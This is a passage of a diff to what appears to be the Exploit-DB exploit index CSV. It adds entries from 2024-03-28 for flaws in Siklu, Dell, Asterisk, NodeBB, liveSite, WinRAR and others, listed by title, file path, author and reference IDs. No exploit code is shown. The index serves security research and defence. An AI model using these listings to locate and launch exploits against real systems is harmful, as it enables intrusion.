 36309,exploits/hardware/dos/36309.py,"Sagem F@st 3304-V2 - Telnet Crash (PoC)",2015-03-08,"Loudiyi Mohamed",dos,hardware,,2015-03-12,2015-03-12,0,OSVDB-119602,,,,,
 34172,exploits/hardware/dos/34172.txt,"Sagem Fast 3304-V1 - Denial of Service",2014-07-27,Z3ro0ne,dos,hardware,,2014-07-27,2014-08-06,0,OSVDB-109608,,,,,
 11633,exploits/hardware/dos/11633.pl,"Sagem Routers - Remote Reset",2010-03-04,AlpHaNiX,dos,hardware,,2010-03-03,,0,,,,,,
@@ -3921,6 +3922,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 19832,exploits/hardware/remote/19832.rb,"Siemens Simatic S7-300 - PLC Remote Memory Viewer (Metasploit)",2012-07-14,"Dillon Beresford",remote,hardware,8080,2012-07-14,2012-07-14,0,OSVDB-73645,"Metasploit Framework (MSF)",,,,
 19831,exploits/hardware/remote/19831.rb,"Siemens Simatic S7-300/400 - CPU START/STOP Module (Metasploit)",2012-07-14,"Dillon Beresford",remote,hardware,102,2012-07-14,2012-07-14,0,OSVDB-72870,"Metasploit Framework (MSF)",,,,
 47083,exploits/hardware/remote/47083.py,"Siemens TIA Portal - Remote Command Execution",2019-07-10,"Joseph Bingham",remote,hardware,,2019-07-10,2020-06-18,0,,,,,,
+51932,exploits/hardware/remote/51932.py,"Siklu MultiHaul TG series < 2.0.0 - unauthenticated credential disclosure",2024-03-28,semaja2,remote,hardware,,2024-03-28,2024-03-28,0,,,,,,
 21268,exploits/hardware/remote/21268.py,"Sitecom MD-25x - Multiple Vulnerabilities",2012-09-12,"Mattijs van Ommeren",remote,hardware,,2012-09-12,2016-12-04,0,OSVDB-85599;OSVDB-85598,,,,http://www.exploit-db.comSitecomNas.2.4.17.bin,http://www.alcyon.nl/advisories/aa-007
 51031,exploits/hardware/remote/51031.py,"SmartRG Router SR510n 2.6.13 - Remote Code Execution",2022-11-11,"Yerodin Richards",remote,hardware,,2022-11-11,2022-11-21,0,CVE-2022-37661,,,,,
 50940,exploits/hardware/remote/50940.txt,"SolarView Compact 6.0 - OS Command Injection",2022-05-17,"Ahmed Alroky",remote,hardware,,2022-05-17,2022-05-17,0,CVE-2022-29303,,,,,
@@ -6979,6 +6981,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44920,exploits/linux/local/44920.txt,"Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution",2018-06-21,"Paul Taylor",local,linux,,2018-06-21,2018-06-21,0,CVE-2018-1235,"Command Injection",,,,
 44920,exploits/linux/local/44920.txt,"Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution",2018-06-21,"Paul Taylor",local,linux,,2018-06-21,2018-06-21,0,CVE-2018-1235,Local,,,,
 44688,exploits/linux/local/44688.txt,"Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read",2018-05-22,"Paul Taylor",local,linux,,2018-05-22,2018-05-22,0,,,,,,
+51934,exploits/linux/local/51934.sh,"Dell Security Management Server <1.9.0 - Local Privilege Escalation",2024-03-28,"Amirhossein Bahramizadeh",local,linux,,2024-03-28,2024-03-28,0,,,,,,
 48131,exploits/linux/local/48131.rb,"Diamorphine Rootkit - Signal Privilege Escalation (Metasploit)",2020-02-24,Metasploit,local,linux,,2020-02-24,2020-02-24,1,,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/local/diamorphine_rootkit_signal_priv_esc.rb
 48131,exploits/linux/local/48131.rb,"Diamorphine Rootkit - Signal Privilege Escalation (Metasploit)",2020-02-24,Metasploit,local,linux,,2020-02-24,2020-02-24,1,,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/local/diamorphine_rootkit_signal_priv_esc.rb
 19501,exploits/linux/local/19501.c,"DIGITAL UNIX 4.0 d/f / AIX 4.3.2 / CDE 2.1 / IRIX 6.5.14 / Solaris 7.0 / SunOS 4.1.4 - Local Buffer Overflow",1999-09-13,"Job de Haas of ITSX",local,linux,,1999-09-13,2012-07-01,1,CVE-1999-0693;OSVDB-1073,,,,,https://www.securityfocus.com/bid/641/info
@@ -10715,6 +10718,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 19751,exploits/multiple/remote/19751.txt,"Ascom COLTSOHO / Brocade Fabric OS / MatchBox / Win98/NT4 / Solaris / Xyplex - SNMP World Writeable Community",2000-02-15,"Michal Zalewski",remote,multiple,,2000-02-15,2012-07-11,1,OSVDB-92015;OSVDB-92014;OSVDB-92013;OSVDB-92012;OSVDB-92011;OSVDB-92010,,,,,https://www.securityfocus.com/bid/986/info
 39175,exploits/multiple/remote/39175.py,"AssistMyTeam Team Helpdesk - Multiple Information Disclosure Vulnerabilities",2014-05-05,bhamb,remote,multiple,,2014-05-05,2016-01-05,1,,,,,,https://www.securityfocus.com/bid/67271/info
 35685,exploits/multiple/remote/35685.txt,"Asterisk 1.8.x - SIP INVITE Request User Enumeration",2011-05-02,"Francesco Tornieri",remote,multiple,,2011-05-02,2015-01-03,1,,,,,,https://www.securityfocus.com/bid/47676/info
+51927,exploits/multiple/remote/51927.py,"Asterisk AMI - Partial File Content & Path Disclosure (Authenticated)",2024-03-28,"Sean Pesce",remote,multiple,,2024-03-28,2024-03-28,0,,,,,,
 27716,exploits/multiple/remote/27716.txt,"Asterisk Recording Interface 0.7.15 - 'Audio.php' Information Disclosure",2006-04-21,"Francois Harvey",remote,multiple,,2006-04-21,2013-08-20,1,CVE-2006-2020;OSVDB-24805,,,,,https://www.securityfocus.com/bid/17641/info
 34301,exploits/multiple/remote/34301.txt,"Asterisk Recording Interface 0.7.15/0.10 - Multiple Vulnerabilities",2010-07-12,TurboBorland,remote,multiple,,2010-07-12,2014-08-09,1,,,,,,https://www.securityfocus.com/bid/41571/info
 46731,exploits/multiple/remote/46731.rb,"Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)",2019-04-19,Metasploit,remote,multiple,,2019-04-19,2019-04-19,1,CVE-2019-3396,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/confluence_widget_connector.rb
@@ -11724,6 +11728,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51013,exploits/multiple/webapps/51013.txt,"Bookwyrm v0.4.3 - Authentication Bypass",2022-09-20,"Akshay Ravi",webapps,multiple,,2022-09-20,2023-08-02,1,CVE-2022-2651,,,,,
 9872,exploits/multiple/webapps/9872.txt,"boxalino 09.05.25-0421 - Directory Traversal",2009-10-20,"Axel Neumann",webapps,multiple,,2009-10-19,,1,CVE-2009-1479;OSVDB-59145,,,,,
 44256,exploits/multiple/webapps/44256.html,"Bravo Tejari Web Portal - Cross-Site Request Forgery",2018-03-06,"Arvind V",webapps,multiple,,2018-03-06,2018-03-06,0,CVE-2018-7216,,,,,
+51930,exploits/multiple/webapps/51930.txt,"Broken Access Control - on NodeBB v3.6.7",2024-03-28,"Vibhor Sharma",webapps,multiple,,2024-03-28,2024-03-28,0,,,,,,
 48649,exploits/multiple/webapps/48649.txt,"BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation",2020-07-07,"William Summerhill",webapps,multiple,,2020-07-07,2020-07-07,0,CVE-2020-14945,,,,,
 48666,exploits/multiple/webapps/48666.txt,"BSA Radar 1.6.7234.24750 - Local File Inclusion",2020-07-14,"William Summerhill",webapps,multiple,,2020-07-14,2020-07-14,0,CVE-2020-14946,,,,,
 48619,exploits/multiple/webapps/48619.txt,"BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting",2020-06-24,"William Summerhill",webapps,multiple,,2020-06-24,2020-06-24,0,CVE-2020-14943,,,,,
@@ -22710,6 +22715,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 23749,exploits/php/webapps/23749.txt,"LiveJournal 1.1 - CSS HTML Injection",2004-02-23,"Michael Scovetta",webapps,php,,2004-02-23,2012-12-30,1,,,,,,https://www.securityfocus.com/bid/9727/info
 42491,exploits/php/webapps/42491.txt,"LiveProjects 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php,,2017-08-18,2017-08-18,0,,,,,,
 42490,exploits/php/webapps/42490.txt,"LiveSales 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php,,2017-08-18,2017-08-18,0,,,,,,
+51936,exploits/php/webapps/51936.txt,"liveSite Version 2019.1 - Remote Code Execution",2024-03-28,tmrswrr,webapps,php,,2024-03-28,2024-03-28,0,,,,,,
 34446,exploits/php/webapps/34446.txt,"LiveStreet 0.2 - '/include/ajax/blogInfo.php?asd' Cross-Site Scripting",2009-08-31,Inj3ct0r,webapps,php,,2009-08-31,2014-08-28,1,CVE-2009-3256;OSVDB-58256,,,,,https://www.securityfocus.com/bid/42422/info
 34445,exploits/php/webapps/34445.txt,"LiveStreet 0.2 - Comment Topic Header Cross-Site Scripting",2009-08-31,Inj3ct0r,webapps,php,,2009-08-31,2014-08-28,1,CVE-2009-3260;OSVDB-58257,,,,,https://www.securityfocus.com/bid/42422/info
 42488,exploits/php/webapps/42488.txt,"LiveSupport 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php,,2017-08-18,2017-08-18,0,,,,,,
@@ -28502,6 +28508,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39157,exploits/php/webapps/39157.txt,"Puntopy - 'novedad.php' SQL Injection",2014-04-06,"Felipe Andrian Peixoto",webapps,php,,2014-04-06,2016-01-03,1,,,,,,https://www.securityfocus.com/bid/67241/info
 50292,exploits/php/webapps/50292.py,"Purchase Order Management System 1.0 - Remote File Upload",2021-09-14,"Aryan Chehreghani",webapps,php,,2021-09-14,2023-08-29,1,,,,,,
 51312,exploits/php/webapps/51312.txt,"Purchase Order Management-1.0 - Local File Inclusion",2023-04-06,nu11secur1ty,webapps,php,,2023-04-06,2023-08-29,1,,,,,,
+51929,exploits/php/webapps/51929.txt,"Purei CMS 1.0 - SQL Injection",2024-03-28,"Number 7",webapps,php,,2024-03-28,2024-03-28,0,,,,,,
 17343,exploits/php/webapps/17343.txt,"Puzzle Apps CMS 3.2 - Local File Inclusion",2011-05-29,"Treasure Priyamal",webapps,php,,2011-05-29,2011-05-29,0,,,,,http://www.exploit-db.compuzzle-3.2.tar.gz,
 21391,exploits/php/webapps/21391.txt,"PVote 1.0/1.5 - Poll Content Manipulation",2002-04-18,"Daniel Nyström",webapps,php,,2002-04-18,2012-09-19,1,CVE-2002-0588;OSVDB-14423,,,,,https://www.securityfocus.com/bid/4540/info
 21397,exploits/php/webapps/21397.txt,"PVote 1.0/1.5 - Unauthorized Administrative Password Change",2002-04-18,"Daniel Nyström",webapps,php,,2002-04-18,2012-09-19,1,CVE-2002-0589;OSVDB-14425,,,,,https://www.securityfocus.com/bid/4541/info
@@ -34069,6 +34076,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 23753,exploits/php/webapps/23753.txt,"Working Resources BadBlue Server 2.40 - 'PHPtest.php' Full Path Disclosure",2004-02-24,"Rafel Ivgi",webapps,php,,2004-02-24,2012-12-30,1,CVE-2004-2374;OSVDB-4063,,,,,https://www.securityfocus.com/bid/9737/info
 4653,exploits/php/webapps/4653.txt,"WorkingOnWeb 2.0.1400 - 'events.php' SQL Injection",2007-11-24,ka0x,webapps,php,,2007-11-23,,1,OSVDB-39278;CVE-2007-6128,,,,,
 51038,exploits/php/webapps/51038.txt,"WorkOrder CMS 0.1.0 - SQL Injection",2023-03-23,"Chokri Hammedi",webapps,php,,2023-03-23,2023-03-23,0,,,,,,
+51928,exploits/php/webapps/51928.txt,"Workout Journal App 1.0 - Stored XSS",2024-03-28,"MURAT CAGRI ALIS",webapps,php,,2024-03-28,2024-03-28,0,,,,,,
 7481,exploits/php/webapps/7481.txt,"WorkSimple 1.2.1 - Remote File Inclusion / Sensitive Data Disclosure",2008-12-15,Osirys,webapps,php,,2008-12-14,,1,OSVDB-50726;CVE-2008-5765;OSVDB-50725;CVE-2008-5764,,,,,
 11550,exploits/php/webapps/11550.txt,"WorkSimple 1.3.2 - Multiple Vulnerabilities",2010-02-23,JIKO,webapps,php,,2010-02-22,2017-01-05,1,,,,,,
 47045,exploits/php/webapps/47045.txt,"WorkSuite PRM 2.4 - 'password' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,80,2019-07-01,2019-07-03,0,,"SQL Injection (SQLi)",,,,
@@ -45590,6 +45598,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 2014,exploits/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow",2006-07-15,"Pablo Isola",remote,windows,515,2006-07-14,2011-04-27,1,OSVDB-27332;CVE-2006-3670,,,,http://www.exploit-db.comWinlpd_1.2.exe,
 42,exploits/windows/remote/42.c,"Winmail Mail Server 2.3 Build 0402 - Remote Format String",2003-06-11,ThreaT,remote,windows,25,2003-06-10,2017-10-04,1,OSVDB-4921;CVE-2003-0391,,,,,
 33848,exploits/windows/remote/33848.py,"WinMount 3.3.401 - '.zip' Remote Buffer Overflow",2010-04-19,lilf,remote,windows,,2010-04-19,2014-06-24,1,,,,,,https://www.securityfocus.com/bid/39557/info
+51935,exploits/windows/remote/51935.c,"WinRAR version 6.22 - Remote Code Execution via ZIP archive",2024-03-28,"E1 Coders",remote,windows,,2024-03-28,2024-03-28,0,,,,,,
 22526,exploits/windows/remote/22526.rb,"WinRM - VBS Remote Code Execution (Metasploit)",2012-11-07,Metasploit,remote,windows,,2012-11-07,2012-11-07,1,,"Metasploit Framework (MSF)",,,,
 24012,exploits/windows/remote/24012.html,"WinSCP 3.5.6 - Long URI Handling Memory Corruption",2004-04-16,"Luca Ercoli",remote,windows,,2004-04-16,2013-01-10,1,,,,,,https://www.securityfocus.com/bid/10160/info
 28007,exploits/windows/remote/28007.txt,"WinSCP 3.8.1 - URI Handler Arbitrary File Access",2006-06-12,"Jelmer Kuperus",remote,windows,,2006-06-12,2013-09-01,1,CVE-2006-3015;OSVDB-26338,,,,,https://www.securityfocus.com/bid/18384/info